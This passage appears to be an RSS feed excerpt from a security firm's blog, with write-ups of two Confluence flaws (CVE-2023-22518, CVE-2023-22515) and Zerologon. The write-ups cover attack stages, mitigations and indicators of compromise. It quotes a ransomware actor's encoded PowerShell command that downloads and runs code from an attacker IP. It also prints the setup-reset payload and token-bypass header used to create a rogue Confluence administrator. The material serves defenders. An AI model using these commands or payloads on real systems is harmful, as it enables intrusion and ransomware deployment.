&lt;p>The ‘WebSudo’ module was designed to support secure administrator sessions. When an administrator is logged in and wants to call an administration function, the ‘WebSudo’ module will require reauthentication. This is similar to the ‘sudo‘ command known from CLI environments.&lt;/p>
&lt;p>However, specifically crafted web requests can bypass this authentication step. The following request was observed during active exploitation:&lt;/p>
&lt;pre tabindex="0">&lt;code>[05/Nov/2023:11:54:54 +0000] - SYSTEMNAME 193.176.179[.]41 POST /json/setup-restore.action?synchronous=true HTTP/1.1 302 44913ms - - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
&lt;/code>&lt;/pre>&lt;p>The endpoint &lt;code>/json/setup-restore.action?synchronous=true&lt;/code> should be protected but is publicly accessible. A &lt;a class="link" href="https://github.com/ForceFledgling/CVE-2023-22518" target="_blank" rel="noopener"
>proof-of-concept&lt;/a> for this exploit was released on November 2nd, 2023.&lt;/p>
&lt;p>For more technical insight, refer to &lt;a class="link" href="https://blog.projectdiscovery.io/atlassian-confluence-auth-bypass/#:~:text=CVE%2D2023%2D22518%20is%20a,eventually%20execute%20arbitrary%20system%20commands." target="_blank" rel="noopener"
>this article&lt;/a>.&lt;/p>
&lt;h2 id="how-is-cve-2023-22518-used-to-deploy-ransomware">How is CVE-2023-22518 used to deploy Ransomware?
&lt;/h2>&lt;p>On November 5th, Rapid7 &lt;a class="link" href="https://www.rapid7.com/blog/post/2023/11/06/etr-rapid7-observed-exploitation-of-atlassian-confluence-cve-2023-22518/" target="_blank" rel="noopener"
>observed exploitation&lt;/a> by the threat actor group ‘Storm-0062’ (aka: ‘DarkShadow’, or ‘Oro0xly’) to deploy the ‘K3RB3R’ Ransomware.&lt;/p>
&lt;h3 id="step-1-gain-initial-access">Step 1: Gain initial access
&lt;/h3>&lt;p>A specific web request to &lt;code>/json/setup-restore.action?synchronous=true&lt;/code> allows the attacker to create an administrator account.&lt;/p>
&lt;h3 id="step-2-run-a-base64-powershell-command">Step 2: Run a Base64 PowerShell command
&lt;/h3>&lt;pre tabindex="0">&lt;code>powershell.exe -exec bypass -nop -enc SQBFAFgAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AMQA5ADMALgAxADcANgAuADEANwA5AC4ANAAxAC8AdABtAHAALgAzADcAIgApACkA
&lt;/code>&lt;/pre>&lt;p>Decodes to:&lt;/p>
&lt;pre tabindex="0">&lt;code>powershell.exe -exec bypass -nop -enc IEX((New-Object Net.WebClient).DownloadString(hxxp://193.176[.]179[.]41/tmp.37))
&lt;/code>&lt;/pre>&lt;h3 id="step-3-download-second-powershell-script">Step 3: Download second PowerShell script
&lt;/h3>&lt;p>Downloads from IP: 193.187.172[.]41&lt;/p>
&lt;p>&lt;img src="https://blog.senthorus.ch/CVE_2023_22518_1.jpg"
loading="lazy"
alt="Malicious script"
>&lt;/p>
&lt;p>Figure 1: Malicious script (Source: &lt;a class="link" href="https://www.trendmicro.com/en_us/research/23/k/cerber-ransomware-exploits-cve-2023-22518.html" target="_blank" rel="noopener"
>Trendmicro&lt;/a>)&lt;/p>
&lt;h3 id="step-4-download-encoded-c3rb3r-payload">Step 4: Download encoded C3RB3R payload
&lt;/h3>&lt;p>&lt;img src="https://blog.senthorus.ch/CVE_2023_22518_2.jpg"
loading="lazy"
alt="Encoded File containing C3RB3R payload"
>&lt;/p>
&lt;p>Figure 2: Encoded File (Source: &lt;a class="link" href="https://www.trendmicro.com/en_us/research/23/k/cerber-ransomware-exploits-cve-2023-22518.html" target="_blank" rel="noopener"
>Trendmicro&lt;/a>)&lt;/p>
&lt;p>&lt;img src="https://blog.senthorus.ch/CVE_2023_22518_3.jpg"
loading="lazy"
alt="Encoded File containing C3RB3R payload"
>&lt;/p>
&lt;p>Figure 3: Encoded File (Source: &lt;a class="link" href="https://www.trendmicro.com/en_us/research/23/k/cerber-ransomware-exploits-cve-2023-22518.html" target="_blank" rel="noopener"
>Trendmicro&lt;/a>)&lt;/p>
&lt;h3 id="step-5-decode-the-payload">Step 5: Decode the payload
&lt;/h3>&lt;p>Using the script from Figure 3.&lt;/p>
&lt;h3 id="step-6-execute-the-decoded-payload">Step 6: Execute the decoded payload
&lt;/h3>&lt;p>The decoded payload encrypts all files, appending &amp;ldquo;.L0CK3D&amp;rdquo; and dropping a ransom note &amp;ldquo;read-me3.txt&amp;rdquo;.&lt;/p>
&lt;h2 id="attack-summary">Attack Summary
&lt;/h2>&lt;p>Various techniques are used:&lt;/p>
&lt;ul>
&lt;li>Defense evasion through Base64 encoded commands&lt;/li>
&lt;li>Multiple C2 servers to evade detection&lt;/li>
&lt;li>Use of Domain Generation Algorithms (DGA)&lt;/li>
&lt;li>Long-lasting C2 connections hidden with decoy traffic&lt;/li>
&lt;/ul>
&lt;p>&lt;img src="https://blog.senthorus.ch/CVE_2023_22518_4.jpg"
loading="lazy"
alt="K3RB3R Attack stages"
>&lt;/p>
&lt;p>Figure 4: &amp;lsquo;K3RB3R&amp;rsquo; Attack stages (Source: Senthorus)&lt;/p>
&lt;h2 id="impact">Impact
&lt;/h2>&lt;p>Threat actors exploiting CVE-2023-22518 can reset the Confluence instance and wipe data. They cannot exfiltrate or modify data. The attack only affects availability.&lt;/p>
&lt;p>A Shodan search from January 9th, 2024, showed more than 3,500 vulnerable Confluence instances. The U.S. had the most with over 770; Switzerland ranked 22nd with 21 instances.&lt;/p>
&lt;p>&lt;img src="https://blog.senthorus.ch/CVE_2023_22518_5.jpg"
loading="lazy"
alt="Shodan search"
>&lt;/p>
&lt;p>Figure 5: Shodan search (Source: Senthorus)&lt;/p>
&lt;h2 id="defending-against-cve-2023-22518">Defending against CVE-2023-22518
&lt;/h2>&lt;h3 id="permanent-mitigation">Permanent mitigation
&lt;/h3>&lt;p>Upgrade to:&lt;/p>
&lt;ul>
&lt;li>7.19.16&lt;/li>
&lt;li>8.3.4&lt;/li>
&lt;li>8.4.4&lt;/li>
&lt;li>8.5.3&lt;/li>
&lt;li>8.6.1&lt;/li>
&lt;/ul>
&lt;h3 id="temporary-solution">Temporary solution
&lt;/h3>&lt;p>If upgrade isn’t possible:&lt;/p>
&lt;ul>
&lt;li>Remove the instance from the internet&lt;/li>
&lt;li>Block access to:
&lt;ul>
&lt;li>/json/setup-restore.action&lt;/li>
&lt;li>/json/setup-restore-local.action&lt;/li>
&lt;li>/json/setup-restore-progress.action&lt;/li>
&lt;/ul>
&lt;/li>
&lt;/ul>
&lt;p>Refer to the &lt;a class="link" href="https://confluence.atlassian.com/security/cve-2023-22518-improper-authorization-vulnerability-in-confluence-data-center-and-server-1311473907.html" target="_blank" rel="noopener"
>Atlassian security advisory&lt;/a> for full guidance.&lt;/p>
&lt;h2 id="indicators-of-compromise-iocs">Indicators of Compromise (IOCs)
&lt;/h2>&lt;ul>
&lt;li>Requests to ‘/json/setup-restore*’ in logs&lt;/li>
&lt;li>Encrypted/corrupted files&lt;/li>
&lt;li>Unexpected admin group members&lt;/li>
&lt;li>IPs: 193.176.179[.]41, 193.43.72[.]11, 45.145.6[.]112, 193.187.172[.]73&lt;/li>
&lt;li>Onion URL: j3qxmk6g5sk3zw62i2yhjnwmhm55rfz47fdyfkhaithlpelfjdokdxad[.]onion&lt;/li>
&lt;/ul>
&lt;h2 id="summary">Summary
&lt;/h2>&lt;p>The high ease of exploitation and large number of vulnerable systems made CVE-2023-22518 attractive to threat actors. We&amp;rsquo;ve shown how it&amp;rsquo;s used to deploy C3RB3R Ransomware. Patching and regular backups are crucial.&lt;/p>
&lt;h2 id="references">References
&lt;/h2>&lt;ul>
&lt;li>&lt;a class="link" href="https://confluence.atlassian.com/security/cve-2023-22518-improper-authorization-vulnerability-in-confluence-data-center-and-server-1311473907.html" target="_blank" rel="noopener"
>Atlassian Security Advisory&lt;/a>&lt;/li>
&lt;li>&lt;a class="link" href="https://socprime.com/blog/cve-2023-22518-detection-exploitation-of-a-new-critical-vulnerability-in-atlassian-confluence-leads-to-cerber-ransomware-deployment/" target="_blank" rel="noopener"
>SOC Prime Analysis&lt;/a>&lt;/li>
&lt;li>&lt;a class="link" href="https://www.rapid7.com/blog/post/2023/11/06/etr-rapid7-observed-exploitation-of-atlassian-confluence-cve-2023-22518/" target="_blank" rel="noopener"
>Rapid7 Blog&lt;/a>&lt;/li>
&lt;li>&lt;a class="link" href="https://www.trendmicro.com/en_us/research/23/k/cerber-ransomware-exploits-cve-2023-22518.html" target="_blank" rel="noopener"
>Trendmicro Report&lt;/a>&lt;/li>
&lt;li>&lt;a class="link" href="https://blog.projectdiscovery.io/atlassian-confluence-auth-bypass/#:~:text=CVE%2D2023%2D22518%20is%20a,eventually%20execute%20arbitrary%20system%20commands" target="_blank" rel="noopener"
>Project Discovery&lt;/a>&lt;/li>
&lt;/ul></description></item><item><title>CVE-2020-1472 - Zerologon</title><link>https://blog.senthorus.ch/posts/cve_2020_1472/</link><pubDate>Wed, 11 Oct 2023 00:00:00 +0000</pubDate><guid>https://blog.senthorus.ch/posts/cve_2020_1472/</guid><description>&lt;img src="https://blog.senthorus.ch/cve_2020_1472/CVE_2020_1472_0.png" alt="Featured image of post CVE-2020-1472 - Zerologon" />&lt;h2 id="introduction">Introduction
&lt;/h2>&lt;p>&lt;a class="link" href="https://github.com/SecuraBV/CVE-2020-1472" target="_blank" rel="noopener"
>CVE-2020-1472&lt;/a>, also known as &amp;ldquo;Zerologon&amp;rdquo;, is a critical vulnerability that allows an unauthenticated attacker to gain domain administrator access to any given, vulnerable Domain Controller (DC). This is due to the incorrect use of an AES mode of operation, which allows anyone to spoof the identity of any computer account and set an empty password for that account in the domain. This vulnerability is rated with the highest possible CVSS score of 10.0 (critical). All versions of the Windows Server Netlogon Remote Protocol are affected, and the setup phase for the attack remains straightforward. The only requirement is the ability to set up a TCP connection with a vulnerable DC.&lt;/p>
&lt;h2 id="presenting-the-netlogon-protocol">Presenting the Netlogon Protocol
&lt;/h2>&lt;h3 id="what-is-the-netlogon-protocol-used-for">What is the Netlogon Protocol Used For?
&lt;/h3>&lt;p>The Netlogon Protocol handles machine and user authentication, authentication of NTP (Network Time Protocol) responses, and allows a computer to update its password in a domain. This last capability is of particular interest to attackers aiming to compromise users or entire domains.&lt;/p>
&lt;h3 id="understanding-the-netlogon-handshake">Understanding the Netlogon Handshake
&lt;/h3>&lt;p>&lt;img src="https://blog.senthorus.ch/cve_2020_1472/CVE_2020_1472_1.jpg"
loading="lazy"
alt="simplified Netlogon authentication handshake"
>&lt;/p>
&lt;p>The client initiates the handshake by sending an 8-byte arbitrary value, the ClientChallenge. The server responds with the ServerChallenge. These challenges, or &amp;ldquo;nonces&amp;rdquo;, are used to derive a session key through a key derivation function (KDF). The client generates a ClientCredential using the session key. The server verifies this by recomputing the value. If it matches, the client is authenticated. The server then sends a ServerCredential for mutual authentication. The parties may agree to encrypt and/or sign subsequent messages.&lt;/p>
&lt;h2 id="what-causes-the-vulnerability">What Causes the Vulnerability?
&lt;/h2>&lt;p>The flaw lies in how ClientCredential and ServerCredential values are computed via the ComputeNetlogonCredential Function. This uses AES-CFB8, a mode of operation for AES. AES-CFB8 should use a random Initialization Vector (IV) for each session, but Netlogon implementation uses a fixed IV of 16 zero bytes. This violation allows for a 1 in 256 chance that an all-zero input results in an all-zero output.&lt;/p>
&lt;p>This enables brute-force attacks using all-zero authentication packets. Eventually, the all-zero iteration in AES-CFB8 is hit, allowing successful authentication.&lt;/p>
&lt;p>&lt;img src="https://blog.senthorus.ch/cve_2020_1472/CVE_2020_1472_2.jpg"
loading="lazy"
alt="hit the all-zero iteration"
>&lt;/p>
&lt;h2 id="how-does-the-exploitation-work">How Does the Exploitation Work?
&lt;/h2>&lt;p>&lt;img src="https://blog.senthorus.ch/cve_2020_1472/CVE_2020_1472_3.jpg"
loading="lazy"
alt="Exploiting the netlogon protocol"
>&lt;/p>
&lt;p>&lt;strong>Step 1: Initiation&lt;/strong>&lt;br>
The attacker sends a specially crafted Netlogon message to the domain controller.&lt;/p>
&lt;p>&lt;strong>Step 2: Malicious Netlogon Messages&lt;/strong>&lt;br>
The attacker sends around 256 malicious Netlogon messages with empty plaintext fields using AES-CFB8. Due to the fixed IV, the attacker can compute the ciphertext without knowing the AES key.&lt;/p>
&lt;p>&lt;strong>Step 3: Authentication Bypass&lt;/strong>&lt;br>
The attacker exploits the all-zero ciphertext validation flaw to impersonate the domain controller.&lt;/p>
&lt;p>&lt;strong>Step 4: Change a Computer&amp;rsquo;s AD Password&lt;/strong>&lt;br>
The attacker changes the domain controller’s computer password to an empty value.&lt;/p>
&lt;p>&lt;strong>Step 5: Privilege Escalation&lt;/strong>&lt;br>
With the password set to empty, the attacker can establish a secure channel and gain administrative access to the domain.&lt;/p>
&lt;p>&lt;img src="https://blog.senthorus.ch/cve_2020_1472/CVE_2020_1472_4.jpg"
loading="lazy"
alt="PCAP of a successful attack"
>&lt;/p>
&lt;h2 id="impact">Impact
&lt;/h2>&lt;ul>
&lt;li>&lt;strong>Complete Domain Compromise&lt;/strong>: Access to all critical resources and sensitive information.&lt;/li>
&lt;li>&lt;strong>Privilege Escalation&lt;/strong>: Gain control over high-privilege systems.&lt;/li>
&lt;li>&lt;strong>Spread of Malware&lt;/strong>: Distribute malware across the network.&lt;/li>
&lt;/ul>
&lt;h2 id="defending-against-zerologon">Defending Against Zerologon
&lt;/h2>&lt;h3 id="how-to-mitigate-the-vulnerability">How to Mitigate the Vulnerability
&lt;/h3>&lt;p>Microsoft released a patch in their August 2020 security update. Apply the patch to mitigate the risks. Additional steps:&lt;/p>
&lt;ul>
&lt;li>Enforce secure RPC communication.&lt;/li>
&lt;li>Monitor network traffic for suspicious Netlogon activity.&lt;/li>
&lt;li>Use enhanced features like Microsoft’s Domain Controller Enforcement Mode.&lt;/li>
&lt;/ul>
&lt;h3 id="artifacts-to-be-observed">Artifacts to be Observed
&lt;/h3>&lt;p>Detectable artifacts include:&lt;/p>
&lt;ul>
&lt;li>&lt;strong>Windows Event ID 4742&lt;/strong>: &amp;ldquo;A computer account was changed.&amp;rdquo;&lt;/li>
&lt;li>&lt;strong>Windows Event ID 4672&lt;/strong>: &amp;ldquo;Special privileges assigned to new logon.&amp;rdquo;&lt;/li>
&lt;/ul>
&lt;p>Event 4742 is uncommon but not unique to attacks. Event 4672 relates to privilege escalation, not the core exploit. It&amp;rsquo;s recommended to monitor for unusual traffic spikes as well.&lt;/p>
&lt;h2 id="how-can-i-check-if-you-are-vulnerable">How Can I Check if You Are Vulnerable?
&lt;/h2>&lt;p>Use the &lt;a class="link" href="https://github.com/SecuraBV/CVE-2020-1472" target="_blank" rel="noopener"
>test-tool published by Secura&lt;/a> to check for Zerologon vulnerability.&lt;/p>
&lt;h2 id="summary">Summary
&lt;/h2>&lt;p>CVE-2020-1472, or Zerologon, posed a severe threat to numerous networks due to its simplicity and the devastating impact of a successful attack. With just TCP access to a vulnerable domain controller, an attacker could compromise the domain.&lt;/p>
&lt;p>This vulnerability highlighted how minor implementation errors can break an otherwise secure system. Regular updates and timely patching are essential for maintaining system security.&lt;/p></description></item><item><title>Confluence Zero-Day CVE-2023-22515</title><link>https://blog.senthorus.ch/posts/cve_2023_22515/</link><pubDate>Wed, 04 Oct 2023 00:00:00 +0000</pubDate><guid>https://blog.senthorus.ch/posts/cve_2023_22515/</guid><description>&lt;img src="https://blog.senthorus.ch/CVE_2023_22515_0.png" alt="Featured image of post Confluence Zero-Day CVE-2023-22515" />&lt;h2 id="introduction">Introduction
&lt;/h2>&lt;p>On October 4th, Atlassian disclosed a zero-day vulnerability affecting Confluence Server and Confluence Data Center, which allows a remote, unauthenticated user to create administrator accounts on the vulnerable Confluence instance. At the time of disclosure, the vulnerability was ongoingly being exploited by a Nation-State-Threat-Actor, with attacks dating back as early as September 14th, as stated in this &lt;a class="link" href="https://twitter.com/msftsecintel/status/1711871732644970856" target="_blank" rel="noopener"
>report from Microsoft&lt;/a>.&lt;/p>
&lt;p>The vulnerability tracked as &lt;a class="link" href="https://jira.atlassian.com/browse/CONFSERVER-92475" target="_blank" rel="noopener"
>CVE-2023-22515&lt;/a> received the highest possible CVSS score of 10.0, ranking it as ‘critical’. Initially, the attack vector was rated as Privilege Escalation, but soon after Atlassian updated it to a Broken Access Control.&lt;/p>
&lt;p>An attacker can exploit CVE-2023-22515 to reactivate the setup phase of the Confluence instance; he then leverages this to create an additional administrator account with his own credentials. No prior knowledge is needed to execute this attack.&lt;/p>
&lt;h2 id="presenting-cve-2023-22515-attack-stages">Presenting CVE-2023-22515 Attack Stages
&lt;/h2>&lt;h3 id="stage-1-change-the-completion-status-of-the-configuration-to-false">Stage 1: Change the completion status of the configuration to ‘false’
&lt;/h3>&lt;p>When an attacker tries to access the setup page for any given Confluence page (&lt;code>https://&amp;lt;confluence-domain&amp;gt;.atlassian.net/setup&lt;/code>), he will get the following message:&lt;/p>
&lt;p>&lt;img src="https://blog.senthorus.ch/CVE_2023_22515_1.png"
loading="lazy"
alt="Setup already complete"
>&lt;/p>
&lt;p>So, in order to start the attack, the attacker needs to send a GET request containing the following payload to the &lt;code>/server-info.action&lt;/code> endpoint:&lt;/p>
&lt;pre tabindex="0">&lt;code>bootstrapStatusProvider.applicationConfig.setupComplete=false
&lt;/code>&lt;/pre>&lt;p>For a detailed explanation, refer to this &lt;a class="link" href="https://blog.qualys.com/vulnerabilities-threat-research/2023/11/15/atlassian-confluence-broken-access-control-vulnerability-cve-2023-22515" target="_blank" rel="noopener"
>blog article from Qualys&lt;/a>.&lt;/p>
&lt;p>After successful execution of the payload, the server will respond with a ‘success’ message confirming it is operational and that the configuration phase is recognized as uncomplete.&lt;/p>
&lt;p>&lt;img src="https://blog.senthorus.ch/CVE_2023_22515_2.png"
loading="lazy"
alt="Server response after successful execution of the payload"
>&lt;/p>
&lt;h3 id="stage-2-accessing-the-setupadministrator-endpoint">Stage 2: Accessing the ‘setupadministrator’ endpoint
&lt;/h3>&lt;p>Now that the setup phase status is marked as incomplete, the next step for the attacker is to access the &lt;code>setupadministrator&lt;/code> endpoint:&lt;/p>
&lt;pre tabindex="0">&lt;code>http://10.10.41.49:8090/setup/setupadministrator-start.action
&lt;/code>&lt;/pre>&lt;p>Trying this directly, the attacker will receive a 403 Forbidden response. To bypass this, the attacker must add the following header to the request:&lt;/p>
&lt;pre tabindex="0">&lt;code>X-Atlassian-Token: no-check
&lt;/code>&lt;/pre>&lt;p>Including this header, the attacker is now able to create a new administrator account.&lt;/p>
&lt;p>&lt;img src="https://blog.senthorus.ch/CVE_2023_22515_3.png"
loading="lazy"
alt="Accessing the administrator configuration page"
>&lt;/p>
&lt;h3 id="stage-3-finishing-the-setup">Stage 3: Finishing the Setup
&lt;/h3>&lt;p>To exit the setup, the attacker proceeds with another POST request to the &lt;code>/setup/finishsetup.action&lt;/code> endpoint. The attacker can now log in with the newly created administrator account.&lt;/p>
&lt;p>The &lt;a class="link" href="https://github.com/Chocapikk/CVE-2023-22515/blob/main/README.md" target="_blank" rel="noopener"
>GitHub page&lt;/a> provides an automated exploit. Use it ethically and only with permission.&lt;/p>
&lt;p>To test the exploit in a safe environment, visit the &lt;a class="link" href="https://tryhackme.com/room/confluence202322515" target="_blank" rel="noopener"
>TryHackMe room&lt;/a>.&lt;/p>
&lt;h2 id="impact">Impact
&lt;/h2>&lt;p>By having full access to all resources on Confluence, an attacker can modify, delete, and exfiltrate data, impacting the Confidentiality, Integrity, and Availability of the data. It is highly recommended to patch the vulnerable versions as soon as possible.&lt;/p>
&lt;h2 id="defending-against-cve-2023-22515">Defending Against CVE-2023-22515
&lt;/h2>&lt;h3 id="affected-versions">Affected Versions
&lt;/h3>&lt;p>Atlassian reported the following versions of Confluence Data Center and Server as vulnerable:&lt;/p>
&lt;p>&lt;img src="https://blog.senthorus.ch/CVE_2023_22515_4.png"
loading="lazy"
alt="Affected Versions of Confluence Data Center and - Server"
>&lt;/p>
&lt;p>(Source: &lt;a class="link" href="https://confluence.atlassian.com/kb/faq-for-cve-2023-22515-1295682188.html" target="_blank" rel="noopener"
>Atlassian&lt;/a>)&lt;/p>
&lt;p>Versions prior to 8.0 are not affected. Cloud Instances hosted by Atlassian are not vulnerable.&lt;/p>
&lt;h3 id="how-to-mitigate-the-vulnerability">How to Mitigate the Vulnerability?
&lt;/h3>&lt;h4 id="permanent-mitigation">Permanent Mitigation
&lt;/h4>&lt;p>Affected organizations should upgrade to one of the following fixed versions (or later):&lt;/p>
&lt;p>&lt;img src="https://blog.senthorus.ch/CVE_2023_22515_5.png"
loading="lazy"
alt="Fixed versions of Confluence"
>&lt;/p>
&lt;p>(Source: &lt;a class="link" href="https://confluence.atlassian.com/kb/faq-for-cve-2023-22515-1295682188.html" target="_blank" rel="noopener"
>Atlassian&lt;/a>)&lt;/p>
&lt;p>Note: Upgrading an already compromised instance will not remove the attacker&amp;rsquo;s access. Isolate the server and contact Atlassian Support.&lt;/p>
&lt;h4 id="temporary-solution">Temporary Solution
&lt;/h4>&lt;p>If an immediate upgrade is not possible, block access to the &lt;code>/setup/&lt;/code> endpoint. Add the following constraint inside the &lt;code>&amp;lt;web-app&amp;gt;&lt;/code> tag in &lt;code>/confluence/WEB-INF/web.xml&lt;/code>:&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-xml" data-lang="xml">&lt;span style="display:flex;">&lt;span>&lt;span style="color:#f92672">&amp;lt;security-constraint&amp;gt;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#f92672">&amp;lt;web-resource-collection&amp;gt;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#f92672">&amp;lt;url-pattern&amp;gt;&lt;/span>/setup/*&lt;span style="color:#f92672">&amp;lt;/url-pattern&amp;gt;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#f92672">&amp;lt;http-method-omission&amp;gt;&lt;/span>*&lt;span style="color:#f92672">&amp;lt;/http-method-omission&amp;gt;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#f92672">&amp;lt;/web-resource-collection&amp;gt;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#f92672">&amp;lt;auth-constraint&lt;/span> &lt;span style="color:#f92672">/&amp;gt;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#f92672">&amp;lt;/security-constraint&amp;gt;&lt;/span>
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;h2 id="indicators-of-compromise-iocs">Indicators of Compromise (IOCs)
&lt;/h2>&lt;ul>
&lt;li>Unknown members in the &lt;code>confluence-administrators&lt;/code> group&lt;/li>
&lt;li>Unexpected newly created user accounts&lt;/li>
&lt;li>Unknown installed plugins&lt;/li>
&lt;li>Requests to &lt;code>/setup/*action&lt;/code> in network access logs&lt;/li>
&lt;li>Presence of &lt;code>/setup/setupadministrator.action&lt;/code> in exception messages in &lt;code>atlassian-confluence-security.log&lt;/code>&lt;/li>
&lt;/ul>
&lt;p>&lt;a class="link" href="https://securitylabs.datadoghq.com/articles/confluence-vulnerability-cve-2023-22515-overview-and-remediation/" target="_blank" rel="noopener"
>Datadog Security Labs&lt;/a> released a list of IPs likely associated with compromise.&lt;/p>
&lt;h2 id="summary">Summary
&lt;/h2>&lt;p>Confluence CVE-2023-22515 allows remote, unauthenticated users to create administrator accounts on non-Atlassian-hosted Confluence sites. It is a critical zero-day vulnerability, already being exploited at the time of disclosure. Organizations are urged to patch affected systems immediately and implement strong backup and response processes.&lt;/p>
&lt;h2 id="references">References
&lt;/h2>&lt;ul>
&lt;li>&lt;a class="link" href="https://securitylabs.datadoghq.com/articles/confluence-vulnerability-cve-2023-22515-overview-and-remediation/" target="_blank" rel="noopener"
>SecurityLabs article&lt;/a>&lt;/li>
&lt;li>&lt;a class="link" href="https://tryhackme.com/room/confluence202322515" target="_blank" rel="noopener"
>TryHackMe Room&lt;/a>&lt;/li>
&lt;li>&lt;a class="link" href="https://www.rapid7.com/blog/post/2023/10/04/etr-cve-2023-22515-zero-day-privilege-escalation-in-confluence-server-and-data-center/" target="_blank" rel="noopener"
>Rapid7 blog post&lt;/a>&lt;/li>
&lt;li>&lt;a class="link" href="https://confluence.atlassian.com/kb/faq-for-cve-2023-22515-1295682188.html" target="_blank" rel="noopener"
>Confluence FAQ&lt;/a>&lt;/li>
&lt;/ul></description></item></channel></rss>